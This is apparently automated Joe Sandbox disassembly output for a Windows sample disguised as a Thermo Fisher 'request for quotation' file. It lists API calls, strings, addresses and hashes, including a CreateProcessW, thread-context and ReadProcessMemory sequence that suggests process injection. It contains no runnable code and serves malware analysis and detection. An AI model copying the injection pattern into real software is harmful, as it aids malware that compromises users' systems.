                                                              • API String ID: 805182592-1757145024
                                                              • Opcode ID: b7c78354bd156ac82d975828cc3193186234996361b98ffcc522e7f26747d713
                                                              • Instruction ID: ce083c93e6e926caeace54a9795ff660810fc4a00adb4d15c16a23b4bc5563ba
                                                              • Opcode Fuzzy Hash: b7c78354bd156ac82d975828cc3193186234996361b98ffcc522e7f26747d713
                                                              • Instruction Fuzzy Hash: D5917071950229AFCF58EFA4CC919EEB7B6BF18310F10842DF416AB391DB30AA45DB54
                                                              APIs
                                                              • _memset.LIBCMT ref: 00673725
                                                              • GetOpenFileNameW.COMDLG32 ref: 0067376F
                                                                • Part of subcall function 0060660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006053B1,?,?,006061FF,?,00000000,00000001,00000000), ref: 0060662F
                                                                • Part of subcall function 006040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006040C6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Name$Path$FileFullLongOpen_memset
                                                              • String ID: X$t3k
                                                              • API String ID: 3777226403-2632078866
                                                              • Opcode ID: 2cd691a3e8636cf0c2913b34514f593272c26892f5b3ae344aadbebd99153e6d
                                                              • Instruction ID: 77717e296461ca1ec6c96c8283df67cca4e077ef7de0a8c16d6d86adcb599deb
                                                              • Opcode Fuzzy Hash: 2cd691a3e8636cf0c2913b34514f593272c26892f5b3ae344aadbebd99153e6d
                                                              • Instruction Fuzzy Hash: 1721D8B1A101989BCF55DF94D805BEF7BFA9F49300F00405DE505A7381DFB45A898F65
                                                              APIs
                                                              • __getstream.LIBCMT ref: 006234FE
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 00623539
                                                              • __wopenfile.LIBCMT ref: 00623549
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                              • String ID: <G
                                                              • API String ID: 1820251861-2138716496
                                                              • Opcode ID: 8574d3911ae3923ca321900209b42b8175c739db8b1a2f2cf3525002bfa13168
                                                              • Instruction ID: 93ee7e710e40c7d46361c83c5c0c124d94ebc3e57f2995a7e18354f98952bcc0
                                                              • Opcode Fuzzy Hash: 8574d3911ae3923ca321900209b42b8175c739db8b1a2f2cf3525002bfa13168
                                                              • Instruction Fuzzy Hash: AB110DB0A00A369FDB51BF70BC426AE36E7AF05350B158969F415D7381EB38CA119F61
                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0061D28B,SwapMouseButtons,00000004,?), ref: 0061D2BC
                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0061D28B,SwapMouseButtons,00000004,?,?,?,?,0061C865), ref: 0061D2DD
                                                              • RegCloseKey.KERNELBASE(00000000,?,?,0061D28B,SwapMouseButtons,00000004,?,?,?,?,0061C865), ref: 0061D2FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: Control Panel\Mouse
                                                              • API String ID: 3677997916-824357125
                                                              • Opcode ID: 22d1e25021d922b60431c12b59af2b900dafee1d2fa561c957d34fb70f38c18f
                                                              • Instruction ID: af23386685a8880268c306be4f011f2bd67485f1549d00b24a54471c92b06653
                                                              • Opcode Fuzzy Hash: 22d1e25021d922b60431c12b59af2b900dafee1d2fa561c957d34fb70f38c18f
                                                              • Instruction Fuzzy Hash: C5117975611208BFDB218FA4CC84EEF7BB9EF09744F184569E901D7250E731AE819B60
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4BA23
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D4BAB9
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D4BADB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                              • Instruction ID: 50661809e072401d952d37ffd95d187509258767b723f3b2abce872003d8c096
                                                              • Opcode Fuzzy Hash: 9ff7d806dc6ef1cc8f26af8a7a5011723b62bd23310367b846ce676590f9e849
                                                              • Instruction Fuzzy Hash: 4862FD30A14658DBEB24CFA4C851BDEB376EF68300F1091A9D10DEB394E7759E81CB69
                                                              APIs
                                                                • Part of subcall function 00604517: _fseek.LIBCMT ref: 0060452F
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C65D
                                                                • Part of subcall function 0064C56D: _wcscmp.LIBCMT ref: 0064C670
                                                              • _free.LIBCMT ref: 0064C4DD
                                                              • _free.LIBCMT ref: 0064C4E4
                                                              • _free.LIBCMT ref: 0064C54F
                                                                • Part of subcall function 00621C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00627A85), ref: 00621CB1
                                                                • Part of subcall function 00621C9D: GetLastError.KERNEL32(00000000,?,00627A85), ref: 00621CC3
                                                              • _free.LIBCMT ref: 0064C557
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                              • String ID:
                                                              • API String ID: 1552873950-0
                                                              • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                              • Instruction ID: 6c00aa2fd6d2fb3d780cbddcb29c5c10652bbf2430165c431f564d0a46096ab8
                                                              • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                                              • Instruction Fuzzy Hash: 975161B1D04218AFDB649F64DC81AAEBBBAEF48314F10409EB209A7341DB715A90CF58
                                                              APIs
                                                              • _memset.LIBCMT ref: 0061EBB2
                                                                • Part of subcall function 006051AF: _memset.LIBCMT ref: 0060522F
                                                                • Part of subcall function 006051AF: _wcscpy.LIBCMT ref: 00605283
                                                                • Part of subcall function 006051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00605293
                                                              • KillTimer.USER32(?,00000001,?,?), ref: 0061EC07
                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0061EC16
                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00673C88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                              • String ID:
                                                              • API String ID: 1378193009-0
                                                              • Opcode ID: fcbc156963efa22df03775652ddea075cd8e6b589c6530b7e5f5815da89562d5
                                                              • Instruction ID: c0a8a425cc1d1a7b25cda6ebb4c447b32e4b26f8d459391c5789cebbab46fa3d
                                                              • Opcode Fuzzy Hash: fcbc156963efa22df03775652ddea075cd8e6b589c6530b7e5f5815da89562d5
                                                              • Instruction Fuzzy Hash: C8210770504794AFE7339B288C55FE7BFEE9B11308F04048DE69E66382C3716A858B51
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 0064C72F
                                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0064C746
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Temp$FileNamePath
                                                              • String ID: aut
                                                              • API String ID: 3285503233-3010740371
                                                              • Opcode ID: c4e04b0e64da5e320160d5df70692f7bb9fd9e72ce9bece52ee99d76db3d2325
                                                              • Instruction ID: f9df400b3dc8f4f9f28c2c8401e35abd9a0bb0bd069d0c4591ff116c85749898
                                                              • Opcode Fuzzy Hash: c4e04b0e64da5e320160d5df70692f7bb9fd9e72ce9bece52ee99d76db3d2325
                                                              • Instruction Fuzzy Hash: 12D05E7150031EBBDB10AB90DC0EFCA776D9700704F0002A07750A50F1DAB0E7998B64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c23cb88fab20d98c880eaad2c63daecfa46249a38c99482d04ad90ef65f11b6b
                                                              • Instruction ID: cca0501eb293461bdd42d5728ade30c5f3661c7daea5cb3859b9fafc1b1b2464
                                                              • Opcode Fuzzy Hash: c23cb88fab20d98c880eaad2c63daecfa46249a38c99482d04ad90ef65f11b6b
                                                              • Instruction Fuzzy Hash: A1F179716083019FC754DF24C881B5AB7E6FF88314F148A2EF9959B392DB30E949CB86
                                                              APIs
                                                              • _memset.LIBCMT ref: 00605022
                                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 006050CB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: IconNotifyShell__memset
                                                              • String ID:
                                                              • API String ID: 928536360-0
                                                              • Opcode ID: e4b3416fa19d8b72e8b48016e0b39cba81f0418b8a1c1993b41efc7868da361e
                                                              • Instruction ID: a1c3b05965c33de6b339fb74eb7b48d92d4156e80b32cfd643b4d0f9b7fe7cf3
                                                              • Opcode Fuzzy Hash: e4b3416fa19d8b72e8b48016e0b39cba81f0418b8a1c1993b41efc7868da361e
                                                              • Instruction Fuzzy Hash: BB317FB15047019FD725DF24D845AABBBE9FF49304F00092EE59B86381E771A944CFA6
                                                              APIs
                                                              • __FF_MSGBANNER.LIBCMT ref: 00623973
                                                                • Part of subcall function 006281C2: __NMSG_WRITE.LIBCMT ref: 006281E9
                                                                • Part of subcall function 006281C2: __NMSG_WRITE.LIBCMT ref: 006281F3
                                                              • __NMSG_WRITE.LIBCMT ref: 0062397A
                                                                • Part of subcall function 0062821F: GetModuleFileNameW.KERNEL32(00000000,006C0312,00000104,00000000,00000001,00000000), ref: 006282B1
                                                                • Part of subcall function 0062821F: ___crtMessageBoxW.LIBCMT ref: 0062835F
                                                                • Part of subcall function 00621145: ___crtCorExitProcess.LIBCMT ref: 0062114B
                                                                • Part of subcall function 00621145: ExitProcess.KERNEL32 ref: 00621154
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000001,00000000,?,?,0061F507,?,0000000E), ref: 0062399F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 1372826849-0
                                                              • Opcode ID: 80b2d093fef5aeb591fb58bef8f489634c2819c4253dd10d36e272d9727c3398
                                                              • Instruction ID: 4e1ebc301791f95de8b0873ea32b3995b17374abc516df824ce3fd83187a7dfd
                                                              • Opcode Fuzzy Hash: 80b2d093fef5aeb591fb58bef8f489634c2819c4253dd10d36e272d9727c3398
                                                              • Instruction Fuzzy Hash: 6001DB71745E319EE6513B34FC46B69234B9B83710F20102AF5059B3C2EBB49D814EA4
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0064C385,?,?,?,?,?,00000004), ref: 0064C6F2
                                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0064C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0064C708
                                                              • CloseHandle.KERNEL32(00000000,?,0064C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0064C70F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 558b19531e75512323c6794198df9814ba56f52c1a65fcb16a3f9c4ba6622fd0
                                                              • Instruction ID: b86ea9c1b65b8bbc83c01fb2708fd5fd42a74259efb2b417b6c28e6a6bea0fec
                                                              • Opcode Fuzzy Hash: 558b19531e75512323c6794198df9814ba56f52c1a65fcb16a3f9c4ba6622fd0
                                                              • Instruction Fuzzy Hash: 04E08632141214B7D7212B54AC0DFCA7F1AAF05770F104210FB54691E097B1291187A8
                                                              APIs
                                                              • _free.LIBCMT ref: 0064BB72
                                                                • Part of subcall function 00621C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00627A85), ref: 00621CB1
                                                                • Part of subcall function 00621C9D: GetLastError.KERNEL32(00000000,?,00627A85), ref: 00621CC3
                                                              • _free.LIBCMT ref: 0064BB83
                                                              • _free.LIBCMT ref: 0064BB95
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                              • Instruction ID: 413dae6b33654a88552dd972c3cee7dd6a39056a041dde732443ac06df5353fa
                                                              • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                                                              • Instruction Fuzzy Hash: ECE0C2A1304B1182CB206538BE44EF313CD8F15310B04180DB459EB242CF28F84088A8
                                                              APIs
                                                                • Part of subcall function 006022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,006024F1), ref: 00602303
                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 006025A1
                                                              • CoInitialize.OLE32(00000000), ref: 00602618
                                                              • CloseHandle.KERNEL32(00000000), ref: 0067503A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                              • String ID:
                                                              • API String ID: 3815369404-0
                                                              • Opcode ID: 7d9d47022237f2cbb54162f15673ea2e627471945a3b2c51b84b276653d6ff2d
                                                              • Instruction ID: 90fe17eac5d09c53aea3163816ec2eb0476cf81ec4a4cfd08a3331eea5bdb0ef
                                                              • Opcode Fuzzy Hash: 7d9d47022237f2cbb54162f15673ea2e627471945a3b2c51b84b276653d6ff2d
                                                              • Instruction Fuzzy Hash: 1571C3B88012858BC348EF5AA994D75BBE7FB5B344794612ED109CF6B3C7388690CF58
                                                              APIs
                                                              • IsThemeActive.UXTHEME ref: 00603A73
                                                                • Part of subcall function 00621405: __lock.LIBCMT ref: 0062140B
                                                                • Part of subcall function 00603ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00603AF3
                                                                • Part of subcall function 00603ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00603B08
                                                                • Part of subcall function 00603D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00603AA3,?), ref: 00603D45
                                                                • Part of subcall function 00603D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00603AA3,?), ref: 00603D57
                                                                • Part of subcall function 00603D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,006C1148,006C1130,?,?,?,?,00603AA3,?), ref: 00603DC8
                                                                • Part of subcall function 00603D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00603AA3,?), ref: 00603E48
                                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00603AB3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                              • String ID:
                                                              • API String ID: 924797094-0
                                                              • Opcode ID: ee0fdce689e41784b42a0666f586fc480f0fe320d9478a6f50a9135cbac66b7c
                                                              • Instruction ID: c15fb5281299db37683bc8141f181b59b46910860d44c84fca1c730626a197be
                                                              • Opcode Fuzzy Hash: ee0fdce689e41784b42a0666f586fc480f0fe320d9478a6f50a9135cbac66b7c
                                                              • Instruction Fuzzy Hash: 2911C0716083519FC300EF29EC0591ABBEBEF96310F00991FF9858B2A2DB708590CBD6
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0062EA29
                                                              • __close_nolock.LIBCMT ref: 0062EA42
                                                                • Part of subcall function 00627BDA: __getptd_noexit.LIBCMT ref: 00627BDA
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                              • String ID:
                                                              • API String ID: 1046115767-0
                                                              • Opcode ID: 5b6cbc9214b09ecf39f478e7c35dc2f24b7817ef791ad670cac7338295ce7a9d
                                                              • Instruction ID: 167a98aa0b80a5d5e8bb3739331690064d6d42334eb30a0636ad99529bf2c008
                                                              • Opcode Fuzzy Hash: 5b6cbc9214b09ecf39f478e7c35dc2f24b7817ef791ad670cac7338295ce7a9d
                                                              • Instruction Fuzzy Hash: AE11C6B2905E709ED751BF64F84175C3A536F41331F164358E4211F1E2CBB58C418FA9
                                                              APIs
                                                                • Part of subcall function 0062395C: __FF_MSGBANNER.LIBCMT ref: 00623973
                                                                • Part of subcall function 0062395C: __NMSG_WRITE.LIBCMT ref: 0062397A
                                                                • Part of subcall function 0062395C: RtlAllocateHeap.NTDLL(00B90000,00000000,00000001,00000001,00000000,?,?,0061F507,?,0000000E), ref: 0062399F
                                                              • std::exception::exception.LIBCMT ref: 0061F51E
                                                              • __CxxThrowException@8.LIBCMT ref: 0061F533
                                                                • Part of subcall function 00626805: RaiseException.KERNEL32(?,?,0000000E,006B6A30,?,?,?,0061F538,0000000E,006B6A30,?,00000001), ref: 00626856
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
